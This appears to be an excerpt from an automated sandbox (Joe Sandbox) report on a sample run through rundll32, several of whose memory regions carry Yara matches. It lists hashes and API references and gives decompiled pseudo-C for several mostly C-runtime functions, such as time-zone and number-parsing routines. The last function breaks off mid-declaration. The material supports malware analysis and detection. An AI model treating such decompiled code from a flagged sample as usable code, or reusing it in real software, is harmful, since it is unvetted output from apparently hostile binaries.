                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: TimerWaitable$CloseCreateCriticalEnterErrorHandleLastSection
                • String ID: timer
                • API String ID: 2759181805-1792073242
                • Opcode ID: 1e1f0ab995bb584afdca0e867e6aa6780e29e9a68caf29b898cc2f10832ad2b9
                • Instruction ID: 0715650b8b0e492d593286714b266234bf2911bfe37dd3dfd57c6cd5354835f7
                • Opcode Fuzzy Hash: 1e1f0ab995bb584afdca0e867e6aa6780e29e9a68caf29b898cc2f10832ad2b9
                • Instruction Fuzzy Hash: 05519B33302FA4C6EB649F61E8887EA73A5FBD5B90F104165DE8943B98DF38D8558B40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205D8A6C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681c70; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681930; // 0x0
                				if (_t56 != 0) goto 0x205d8ae7;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681930 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d8ad6;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681930 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681930; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d8afb;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d8afd;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d8b8a;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d8b23;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d8b21;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d8b23;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d8b8a;
                				if (_t79 == 0) goto 0x205d8b32;
                				goto 0x205d8b8a;
                				E00000215215205DBA2C(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205d8b61;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681c70 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                 			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowcodecvt
                • String ID: false
                • API String ID: 1380809304-734881840
                • Opcode ID: 4a9446ec6d2eaec5e2504a0482ba1745b2ef33776e674e39c8e6a4b58bec5c23
                • Instruction ID: c49ead9c7730bd2e027b4c8fa92592e8d7f40ed666327d1be691613d9548b2ff
                • Opcode Fuzzy Hash: 4a9446ec6d2eaec5e2504a0482ba1745b2ef33776e674e39c8e6a4b58bec5c23
                • Instruction Fuzzy Hash: 20313B77306E60C1FA219B25E5582E96365EBE4BE0F185293EE6D07BEDDE38D4438700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E00007FFA7FFA535E6478(long long* __rax, long long __rbx, signed int* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a8, intOrPtr _a16, long long _a24, long long _a32) {
                				void* _v40;
                				long long _v48;
                				intOrPtr _v56;
                				void* _v80;
                				long long _v84;
                				long long _v88;
                				long long _v92;
                				long long _v96;
                				long long _v100;
                				long long _v104;
                				long long _v108;
                				void* _v112;
                				long long _v116;
                				long long _v120;
                				long long _v124;
                				long long _v128;
                				long long _v132;
                				long long _v136;
                				long long _v140;
                				long long _v144;
                				long long _v148;
                				long long _v152;
                				long long _v156;
                				intOrPtr _v160;
                				long long _v164;
                				long long _v168;
                				void* _t144;
                				void* _t149;
                				signed char _t151;
                				void* _t154;
                				signed short _t155;
                				void* _t156;
                				signed int _t157;
                				signed char _t160;
                				void* _t162;
                				void* _t164;
                				void* _t167;
                				signed short _t168;
                				signed char _t169;
                				signed char _t170;
                				void* _t171;
                				void* _t173;
                				void* _t182;
                				void* _t263;
                				signed int _t284;
                				signed int* _t286;
                				signed short* _t304;
                				intOrPtr* _t305;
                				void* _t326;
                				long long* _t328;
                				long long* _t329;
                				signed long long _t340;
                				long long* _t342;
                				signed long long _t344;
                				signed int _t348;
                				signed int _t349;
                				long long* _t355;
                				long long* _t356;
                				long long* _t379;
                				signed int* _t380;
                				intOrPtr* _t381;
                				void* _t396;
                				signed long long _t398;
                				void* _t402;
                
                				_t396 = __r8;
                				_a8 = __rbx;
                				_a24 = __rbp;
                				_a32 = __rsi;
                				r13d = 0;
                				sil = r9b;
                				r15d = r8d;
                				_t380 = __rdx;
                				if ( *((intOrPtr*)(__rdx)) != _t402) goto 0x535e64ce;
                				_t144 = E00007FFA7FFA535E8380(__rax);
                				 *__rax = 0x16;
                				E00007FFA7FFA535E8260(_t144);
                				_t342 =  *((intOrPtr*)(__rdx + 8));
                				if (_t342 == 0) goto 0x535e64c7;
                				 *_t342 =  *((intOrPtr*)(__rdx));
                				goto 0x535e6c0f;
                				if (r8d == 0) goto 0x535e64dc;
                				if (0 - 0x22 > 0) goto 0x535e64a8;
                				E00007FFA7FFA535E4AE8(0, __rbx,  &_v80, _t342);
                				_v48 =  *_t380;
                				goto 0x535e6512;
                				_t284 =  *_t380 + 2;
                				 *_t380 = _t284;
                				_t344 = _t168 & 0x0000ffff;
                				_t149 = E00007FFA7FFA535E8604(_t169, _t171,  *( *_t380) & 0x0000ffff, _t344);
                				if (_t284 != 0) goto 0x535e6508;
                				bpl = sil != 0;
                				if (_t168 != 0x2d) goto 0x535e6538;
                				goto 0x535e653e;
                				_t182 = _t168 - 0x2b;
                				if (_t182 != 0) goto 0x535e654b;
                				_t286 =  *_t380 + 2;
                				 *_t380 = _t286;
                				_v84 = 0x66a;
                				 *_t286 =  *_t286 + _t149;
                				_t151 = _t149 + sil |  *_t286;
                				 *((intOrPtr*)(_t344 + 0x30)) =  *((intOrPtr*)(_t344 + 0x30)) + dil;
                				_v120 = 0xb66;
                				if (_t182 < 0) goto 0x535e6586;
                				 *_t286 =  *_t286 + _t151;
                				r11d = 0xff10;
                				_v96 = 0xc66;
                				r10d = 0xd82484c7000009e6;
                				_v152 = 0xc70;
                				asm("out 0xc, al");
                				 *0xae6 =  *0xae6 + _t151;
                				r8d = 0x6f0;
                				_v144 = 0xcf0;
                				r9d = 0x966;
                				_v88 = 0xd66;
                				_v136 = 0xd70;
                				_v104 = 0xe50;
                				_v128 = 0xe5a;
                				_v92 = 0xed0;
                				_v168 = 0xeda;
                				_v164 = 0xf20;
                				_v156 = 0xf2a;
                				_v148 = 0x1040;
                				_v140 = 0x104a;
                				_v132 = 0x17e0;
                				_v124 = 0x17ea;
                				_v116 = 0x1810;
                				_v108 = 0x181a;
                				_v100 = 0xff1a;
                				if ((r15d & 0xffffffef) != 0) goto 0x535e68e2;
                				if (_t168 - _t169 < 0) goto 0x535e6808;
                				if (_t168 - 0x3a >= 0) goto 0x535e6656;
                				goto 0x535e6803;
                				if (_t168 - r11w >= 0) goto 0x535e67f1;
                				if (_t168 - _t171 < 0) goto 0x535e6808;
                				if (_t168 - _v84 >= 0) goto 0x535e667a;
                				goto 0x535e6803;
                				if (_t168 - r8w < 0) goto 0x535e6808;
                				dil = 0xc3;
                				goto 0x535e6803;
                				if (_t168 - r9w < 0) goto 0x535e6808;
                				dil = 0xc3;
                				goto 0x535e6803;
                				if (_t168 - r10w < 0) goto 0x535e6808;
                				dil = 0xc3;
                				_t154 = _t151 - r8d - r9d - r10d;
                				goto 0x535e6803;
                				if (_t168 - _t173 < 0) goto 0x535e6808;
                				_t170 = _t169 |  *_t380;
                				dil = 0xc3;
                				goto 0x535e6803;
                				if (_t168 - _t154 < 0) goto 0x535e6808;
                				if (_t168 - _a16 >= 0) goto 0x535e6714;
                				goto 0x535e6803;
                				if (_t168 - _t171 < 0) goto 0x535e6808;
                				if (_t168 - _v160 < 0) goto 0x535e6670;
                				if (_t168 - _t171 < 0) goto 0x535e6808;
                				if (_t168 - _v152 < 0) goto 0x535e6670;
                				if (_t168 - _t171 < 0) goto 0x535e6808;
                				if (_t168 - _v144 < 0) goto 0x535e6670;
                				if (_t168 - _t171 < 0) goto 0x535e6808;
                				if (_t168 - _v136 < 0) goto 0x535e6670;
                				if (_t168 - _t171 < 0) goto 0x535e6808;
                				if (_t168 - _v128 < 0) goto 0x535e6670;
                				if (_t168 - _t171 < 0) goto 0x535e6808;
                				if (_t168 - _v168 < 0) goto 0x535e6670;
                				if (_t168 - _t171 < 0) goto 0x535e6808;
                				if (_t168 - _v156 < 0) goto 0x535e6670;
                				if (_t168 - _t171 < 0) goto 0x535e6808;
                				if (_t168 - _v140 < 0) goto 0x535e6670;
                				if (_t168 - _t171 < 0) goto 0x535e6808;
                				if (_t168 - _v124 < 0) goto 0x535e6670;
                				if (_t168 - _t171 < 0) goto 0x535e6808;
                				if (_t168 - _v108 >= 0) goto 0x535e6808;
                				goto 0x535e6670;
                				if (_t168 - _v100 >= 0) goto 0x535e6800;
                				_t155 = _t154 - r11d;
                				goto 0x535e6803;
                				if ((_t168 & 0x0000ffff | 0xffffffff) != 0xffffffff) goto 0x535e6831;
                				if (_t155 - 0x19 <= 0) goto 0x535e681f;
                				if (_t155 - 0x19 <= 0) goto 0x535e681f;
                				goto 0x535e6831;
                				if (_t155 - 0x19 > 0) goto 0x535e682e;
                				if (r15d != 0) goto 0x535e6894;
                				r15d = 0xb74c0850000000a;
                				goto 0x535e6894;
                				_t304 =  *_t380;
                				r8d = 0xffdf;
                				_t377 =  *_t304 & 0x0000ffff;
                				_t61 =  &(_t304[1]); // 0xffe1
                				_t348 = _t61;
                				 *_t380 = _t348;
                				_t62 = _t377 - 0x58; // 0x608
                				_t305 = _t62;
                				if ((r8w & _t155) == 0) goto 0x535e68ca;
                				r15d =  ==  ? _t173 : r15d;
                				_t349 = _t348 + 0xfffffffe;
                				 *_t380 = _t349;
                				if (_t171 == 0) goto 0x535e688f;
                				if ( *_t349 == _t171) goto 0x535e688f;
                				_t156 = E00007FFA7FFA535E8380(_t305);
                				 *_t305 = 0x16;
                				_t157 = E00007FFA7FFA535E8260(_t156);
                				r11d = 0xff10;
                				asm("ror byte [eax-0x7d], cl");
                				asm("enter 0x41ff, 0xbd");
                				asm("pushad");
                				asm("push es");
                				 *_t305 =  *_t305 + _t157;
                				r12d = 0x6f0;
                				if (_t168 - _t170 < 0) goto 0x535e6a8c;
                				if (_t168 - 0x3a >= 0) goto 0x535e68e9;
                				r8d = _t168 & 0x0000ffff;
                				r8d = r8d - _t170;
                				goto 0x535e6a86;
                				_t340 =  *0x30 & 0x0000ffff;
                				_t381 =  ==  ? 0x10 : _t380;
                				 *_t381 = 0x33d7634d00000032;
                				goto 0x535e688f;
                				if (_t340 - _t340 >= 0) goto 0x535e6a72;
                				if (_t168 - r13w < 0) goto 0x535e6a8c;
                				r8d = r8d - r13d;
                				goto 0x535e6a86;
                				if (_t168 - r12w < 0) goto 0x535e6a8c;
                				_t160 = _t157 / _t398 | 0x44;
                				r8d = r8d - r12d;
                				goto 0x535e6a86;
                				asm("or byte [ebx+0x1], 0x0");
                				 *0x966 =  *0x966 + 0x966;
                				 *0xEC149C7500000108 =  *((intOrPtr*)(0xec149c7500000108)) + _t160;
                				spl = spl |  *0x4166ABEB00000049;
                				if (_t340 - 0x966 >= 0) goto 0x535e6957;
                				r8d = _t168 & 0x0000ffff;
                				r8d = r8d - _t160;
                				goto 0x535e6a86;
                				asm("and byte [edi], 0x1");
                				 *0x9e6 =  *0x9e6 + 0x9e6;
                				 *((intOrPtr*)(0xec149c7500000108)) =  *((intOrPtr*)(0xec149c7500000108)) + _t160;
                				spl = spl |  *0x4166ABEB00000049;
                				if (_t340 - 0x9e6 < 0) goto 0x535e694b;
                				_t84 = _t396 + 0x76; // 0xa66
                				if (_t168 - _t84 < 0) goto 0x535e6a8c;
                				r8d = 0xfd83b66000009f0;
                				if (_t168 - r8w < 0) goto 0x535e694b;
                				_t86 = _t396 + 0x76; // 0xae6
                				_t162 = _t86;
                				if (_t168 - _t162 < 0) goto 0x535e6a8c;
                				if (_t168 - _a16 < 0) goto 0x535e694b;
                				if (_t168 - _t162 < 0) goto 0x535e6a8c;
                				if (_t168 - _v160 < 0) goto 0x535e694b;
                				if (_t168 - _t162 < 0) goto 0x535e6a8c;
                				if (_t168 - _v152 < 0) goto 0x535e694b;
                				if (_t168 - _t162 < 0) goto 0x535e6a8c;
                				if (_t168 - _v144 < 0) goto 0x535e694b;
                				if (_t168 - _t162 < 0) goto 0x535e6a8c;
                				if (_t168 - _v136 < 0) goto 0x535e694b;
                				if (_t168 - _t162 < 0) goto 0x535e6a8c;
                				if (_t168 - _v128 < 0) goto 0x535e694b;
                				if (_t168 - _t162 < 0) goto 0x535e6a8c;
                				if (_t168 - _v168 < 0) goto 0x535e694b;
                				if (_t168 - _t162 < 0) goto 0x535e6a8c;
                				if (_t168 - _v156 < 0) goto 0x535e694b;
                				if (_t168 - _t162 < 0) goto 0x535e6a8c;
                				if (_t168 - _v140 < 0) goto 0x535e694b;
                				if (_t168 - _t162 < 0) goto 0x535e6a8c;
                				if (_t168 - _v124 < 0) goto 0x535e694b;
                				if (_t168 - _t162 < 0) goto 0x535e6a8c;
                				if (_t168 - _v108 >= 0) goto 0x535e6a8c;
                				goto 0x535e694b;
                				if (_t168 - _v100 >= 0) goto 0x535e6a82;
                				r8d = _t168 & 0x0000ffff;
                				r8d = r8d - r11d;
                				goto 0x535e6a86;
                				r8d = r8d | 0xffffffff;
                				if (r8d != 0xffffffff) goto 0x535e6ab9;
                				if (_t162 - 0x19 <= 0) goto 0x535e6aa4;
                				if (_t162 - 0x19 <= 0) goto 0x535e6aa4;
                				r8d = r8d | 0xffffffff;
                				goto 0x535e6ab9;
                				_t111 = _t340 - 0x61; // 0xfeaf
                				_t326 = _t111;
                				r8d = _t168 & 0x0000ffff;
                				if (_t162 - 0x19 > 0) goto 0x535e6ab5;
                				r8d = r8d - 0x20;
                				r8d = r8d + 0xffffffc9;
                				if (r8d == 0xffffffff) goto 0x535e6afe;
                				if (r8d - r15d >= 0) goto 0x535e6afe;
                				_t263 = _t402 - _t305;
                				if (_t263 < 0) goto 0x535e6ada;
                				if (_t263 != 0) goto 0x535e6ad5;
                				if (_t326 - ( *_t304 & 0x0000ffff) <= 0) goto 0x535e6ada;
                				goto 0x535e6aec;
                				r14d = r8d;
                				dil = 0x18;
                				 *_t381 = _t326 + 2;
                				goto 0x535e68af;
                				 *_t381 =  *_t381 + 0xfffffffe;
                				r13d = 0;
                				_t328 =  *_t381;
                				if (_t168 == 0) goto 0x535e6b2a;
                				if ( *_t328 == _t168) goto 0x535e6b2a;
                				_t164 = E00007FFA7FFA535E8380(_t328);
                				 *_t328 = 0x16;
                				E00007FFA7FFA535E8260(_t164);
                				if ((sil & bpl) != 0) goto 0x535e6b51;
                				 *_t381 = _v48;
                				if (_v56 == r13b) goto 0x535e64b8;
                				_t329 = _v80;
                				 *(_t329 + 0x3a8) =  *(_t329 + 0x3a8) & 0xfffffffd;
                				goto 0x535e64b8;
                				if (E00007FFA7FFA535E6118(_t170) == 0) goto 0x535e6bde;
                				_t167 = E00007FFA7FFA535E8380(_t329);
                				 *_t329 = 0x22;
                				if ((bpl & 0x00000001) != 0) goto 0x535e6b76;
                				goto 0x535e6be7;
                				if ((bpl & 0x00000002) == 0) goto 0x535e6bad;
                				if (_v56 == r13b) goto 0x535e6b92;
                				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
                				_t355 =  *((intOrPtr*)(_t381 + 8));
                				if (_t355 == 0) goto 0x535e6ba1;
                				 *_t355 =  *_t381;
                				goto 0x535e6c0f;
                				if (_v56 == r13b) goto 0x535e6bc3;
                				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
                				_t356 =  *((intOrPtr*)(_t381 + 8));
                				if (_t356 == 0) goto 0x535e6bd2;
                				 *_t356 =  *_t381;
                				goto 0x535e6c0f;
                				if ((bpl & 0x00000002) == 0) goto 0x535e6be7;
                				if (_v56 == r13b) goto 0x535e6bfd;
                				 *(_v80 + 0x3a8) =  *(_v80 + 0x3a8) & 0xfffffffd;
                				_t379 =  *((intOrPtr*)(_t381 + 8));
                				if (_t379 == 0) goto 0x535e6c0c;
                				 *_t379 =  *_t381;
                				return _t167;
                			}


                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: +$-$f$p
                • API String ID: 3215553584-588565063
                • Opcode ID: 426e360ae1e79765073973edcb545938b5323c8836b4422cb39569a496d13089
                • Instruction ID: 306b8eff74f54417a3e7e20041b2527a56d57bda196a8f21fce89b5a13644fe6
                • Opcode Fuzzy Hash: 426e360ae1e79765073973edcb545938b5323c8836b4422cb39569a496d13089
                • Instruction Fuzzy Hash: FB12D822E2CB538EFB605B10D044279669BEFD27A0F9CD2B1D69D175C4CB3DE488AB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 43%
                			E00007FFA7FFA535EB50C(void* __ecx, void* __edx, void* __eflags, intOrPtr* __rax, void* __r8, signed long long _a8, long long _a16, signed long long _a24, char _a32) {
                				long long _v48;
                				long long _v56;
                				long long _v64;
                				long long _v72;
                				void* __rbx;
                				void* _t34;
                				int _t43;
                				void* _t44;
                				void* _t45;
                				void* _t46;
                				void* _t47;
                				void* _t49;
                				void* _t55;
                				void* _t56;
                				intOrPtr* _t62;
                				intOrPtr _t64;
                				long long _t67;
                				long long _t71;
                				long long* _t73;
                				intOrPtr* _t74;
                				long long _t81;
                				signed long long _t83;
                				signed long long _t88;
                				void* _t100;
                
                				_t62 = __rax;
                				_t48 = __edx;
                				_t47 = __ecx;
                				E00007FFA7FFA535EAA38(_t34);
                				_a8 = 0;
                				_t74 = _t62;
                				_a16 = 0;
                				_a24 = 0;
                				E00007FFA7FFA535EAAA0(__edx, _t62,  &_a8);
                				if (_t62 != 0) goto 0x535eb6cb;
                				E00007FFA7FFA535EAA40(__edx, _t62,  &_a16);
                				if (_t62 != 0) goto 0x535eb6b6;
                				E00007FFA7FFA535EAA70(__edx, _t62,  &_a24);
                				if (_t62 != 0) goto 0x535eb6a1;
                				_t81 =  *0x53755278; // 0x0
                				E00007FFA7FFA535E7E58(_t62, _t81);
                				 *0x53755278 = 0;
                				GetTimeZoneInformation(??);
                				if (_t62 == 0xffffffff) goto 0x535eb67a;
                				_t83 =  *0x53755290 * 0x3c;
                				r8d = 1;
                				_t55 =  *0x537552d6 - _t49; // 0x0
                				_t88 =  *0x537552e4; // 0x0
                				 *0x53755280 = r8d;
                				_a8 = _t83;
                				if (_t55 == 0) goto 0x535eb5b3;
                				_a8 = _t83 + _t88 * 0x3c;
                				_t56 =  *0x5375532a - _t49; // 0x0
                				if (_t56 == 0) goto 0x535eb5d4;
                				_t64 =  *0x53755338; // 0x0
                				if (_t64 == 0) goto 0x535eb5d4;
                				_a16 = r8d;
                				_a24 = (_t64 - _t88) * 0x3c;
                				goto 0x535eb5da;
                				_a16 = 0;
                				_a24 = 0;
                				E00007FFA7FFA535F04CC(_t47, _t48, (_t64 - _t88) * 0x3c, _t74, _t83 + _t88 * 0x3c, _t88, _t100);
                				r9d = r9d | 0xffffffff;
                				_t67 =  &_a32;
                				_v48 = _t67;
                				_v56 = 0;
                				_v64 = 0x3f;
                				_v72 =  *_t74;
                				WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                				if (_t67 == 0) goto 0x535eb626;
                				if (_a32 != 0) goto 0x535eb626;
                				 *((intOrPtr*)( *_t74 + 0x3f)) = sil;
                				goto 0x535eb62c;
                				 *((intOrPtr*)( *_t74)) = sil;
                				r9d = r9d | 0xffffffff;
                				_v48 =  &_a32;
                				_t71 =  *((intOrPtr*)(_t74 + 8));
                				_v56 = 0;
                				_v64 = 0x3f;
                				_v72 = _t71;
                				_t43 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                				if (_t71 == 0) goto 0x535eb673;
                				if (_a32 != 0) goto 0x535eb673;
                				 *((intOrPtr*)( *((intOrPtr*)(_t74 + 8)) + 0x3f)) = sil;
                				goto 0x535eb67a;
                				_t73 =  *((intOrPtr*)(_t74 + 8));
                				 *_t73 = sil;
                				_t44 = E00007FFA7FFA535EAA30(_t43);
                				 *_t73 = _a8;
                				_t45 = E00007FFA7FFA535EAA20(_t44);
                				 *_t73 = _a16;
                				_t46 = E00007FFA7FFA535EAA28(_t45);
                				 *_t73 = _a24;
                				return _t46;
                			}

                APIs
                • _get_daylight.LIBCMT ref: 00007FFA535EB52F
                  • Part of subcall function 00007FFA535EAAA0: _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EAAB4
                • _get_daylight.LIBCMT ref: 00007FFA535EB540
                  • Part of subcall function 00007FFA535EAA40: _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EAA54
                • _get_daylight.LIBCMT ref: 00007FFA535EB551
                  • Part of subcall function 00007FFA535EAA70: _invalid_parameter_noinfo.LIBCMT ref: 00007FFA535EAA84
                  • Part of subcall function 00007FFA535E7E58: HeapFree.KERNEL32(?,?,?,00007FFA535E7915,?,?,?,?,?,?,00000000,00007FFA535E7C0D), ref: 00007FFA535E7E6E
                  • Part of subcall function 00007FFA535E7E58: GetLastError.KERNEL32(?,?,?,00007FFA535E7915,?,?,?,?,?,?,00000000,00007FFA535E7C0D), ref: 00007FFA535E7E80
                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFA535EB7B1), ref: 00007FFA535EB578
                • WideCharToMultiByte.KERNEL32 ref: 00007FFA535EB60E
                • WideCharToMultiByte.KERNEL32 ref: 00007FFA535EB65A
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                • String ID: ?
                • API String ID: 500310315-1684325040
                • Opcode ID: 111ad4cd6d1bb2ad17c1a5392ad20200b70e285143b38717c875d5bf34a77e23
                • Instruction ID: 4a97054d569c4b0cdfeb428315169a85bf3cda63ebc154d09537f472f6eee79c
                • Opcode Fuzzy Hash: 111ad4cd6d1bb2ad17c1a5392ad20200b70e285143b38717c875d5bf34a77e23
                • Instruction Fuzzy Hash: 2461C37292CF428AE750DF20E9401B9776AFFC6794F48A136EA0E52A94DF3CE445D740
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 33%
                			E0000021521520614038(void* __ecx, void* __edx, void* __eflags, signed int** __rax, void* __rdx, signed int _a8, signed int _a16, signed int _a24, char _a32) {
                				long long _v48;
                				long long _v56;
                				intOrPtr _v64;
                				long long _v72;
                				void* _t34;
                				intOrPtr _t42;
                				void* _t48;
                				void* _t49;
                				void* _t50;
                				signed int _t55;
                				signed int _t60;
                				intOrPtr _t70;
                				intOrPtr _t71;
                				signed int** _t77;
                				signed int* _t84;
                				signed int** _t85;
                				long long _t89;
                				long long _t93;
                
                				_t77 = __rax;
                				E0000021521520613D50(_t34);
                				_a8 = 0;
                				_t85 = _t77;
                				_a16 = 0;
                				_a24 = 0;
                				if (E0000021521520613DB8(__edx, _t77,  &_a8) != 0) goto 0x206141f7;
                				if (E0000021521520613D58(__edx, _t77,  &_a16) != 0) goto 0x206141e2;
                				if (E0000021521520613D88(__edx, _t77,  &_a24) != 0) goto 0x206141cd;
                				_t89 =  *0x20682f98; // 0x0
                				E000002152152060A780(_t77, _t89);
                				 *0x20682f98 = _t93;
                				if (GetTimeZoneInformation(??) == 0xffffffff) goto 0x206141a6;
                				_t55 =  *0x20682fb0 * 0x3c;
                				_t7 = _t93 + 1; // 0x1
                				r8d = _t7;
                				_t70 =  *0x20682ff6; // 0x0
                				_t60 =  *0x20683004; // 0x0
                				 *0x20682fa0 = r8d;
                				_a8 = _t55;
                				if (_t70 == 0) goto 0x206140df;
                				_a8 = _t55 + _t60 * 0x3c;
                				_t71 =  *0x2068304a; // 0x0
                				if (_t71 == 0) goto 0x20614100;
                				_t42 =  *0x20683058; // 0x0
                				if (_t42 == 0) goto 0x20614100;
                				_a16 = r8d;
                				_a24 = (_t42 - _t60) * 0x3c;
                				goto 0x20614106;
                				_a16 = 0;
                				_a24 = 0;
                				E00000215215206074C8(_t77);
                				r9d = r9d | 0xffffffff;
                				_v48 =  &_a32;
                				_v56 = _t93;
                				_v64 = 0x3f;
                				_v72 =  *_t85;
                				if (WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??) == 0) goto 0x20614152;
                				if (_a32 != 0) goto 0x20614152;
                				( *_t85)[0xf] = sil;
                				goto 0x20614158;
                				 *( *_t85) = sil;
                				r9d = r9d | 0xffffffff;
                				_v48 =  &_a32;
                				_v56 = _t93;
                				_v64 = 0x3f;
                				_v72 = _t85[1];
                				if (WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??) == 0) goto 0x2061419f;
                				if (_a32 != 0) goto 0x2061419f;
                				_t85[1][0xf] = sil;
                				goto 0x206141a6;
                				_t84 = _t85[1];
                				 *_t84 = sil;
                				_t48 = E0000021521520613D48(_t47);
                				 *_t84 = _a8;
                				_t49 = E0000021521520613D38(_t48);
                				 *_t84 = _a16;
                				_t50 = E0000021521520613D40(_t49);
                				 *_t84 = _a24;
                				return _t50;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                • String ID: ?
                • API String ID: 500310315-1684325040
                • Opcode ID: 8a5c3eb81ff16a2648225461e465bfc374ee5137f32fe503cd95229368054096
                • Instruction ID: d0c4c2961d8ed56b38c2447a7ce31f54ecc17cdd045859ce1c2289c543595707
                • Opcode Fuzzy Hash: 8a5c3eb81ff16a2648225461e465bfc374ee5137f32fe503cd95229368054096
                • Instruction Fuzzy Hash: 0A617D33202A60DAEB709F21E8897D9B7A4FFE4794F640156AE4947B9CDB38D985C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 54%
                			E00000215215205BA220(void* __ecx, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
                				void* __rdi;
                				void* __rbp;
                				signed int _t75;
                				signed int _t82;
                				void* _t86;
                				void* _t88;
                				long long _t103;
                				long long _t107;
                				long long _t112;
                				long long _t113;
